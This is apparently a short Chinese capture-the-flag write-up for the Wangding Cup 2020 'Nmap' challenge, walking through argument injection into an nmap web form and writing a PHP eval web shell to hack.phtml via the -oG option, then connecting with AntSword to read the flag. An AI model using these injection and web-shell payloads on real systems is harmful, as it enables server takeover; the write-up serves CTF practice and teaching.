命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
simplepeng7 小时前
我的天,我真是和androidx的字体加载杠上了
android
小猫猫猫◍˃ᵕ˂◍8 小时前
备忘录模式:快速恢复原始数据
android·java·备忘录模式
CYRUS_STUDIO10 小时前
使用 AndroidNativeEmu 调用 JNI 函数
android·逆向·汇编语言
梦否10 小时前
【Android】类加载器&热修复-随记
android
徒步青云10 小时前
Java内存模型
android
今阳11 小时前
鸿蒙开发笔记-6-装饰器之@Require装饰器,@Reusable装饰器
android·app·harmonyos
-优势在我15 小时前
Android TabLayout 实现随意控制item之间的间距
android·java·ui
hedalei15 小时前
android13修改系统Launcher不跟随重力感应旋转
android·launcher
Indoraptor17 小时前
Android Fence 同步框架
android
峥嵘life17 小时前
DeepSeek本地搭建 和 Android
android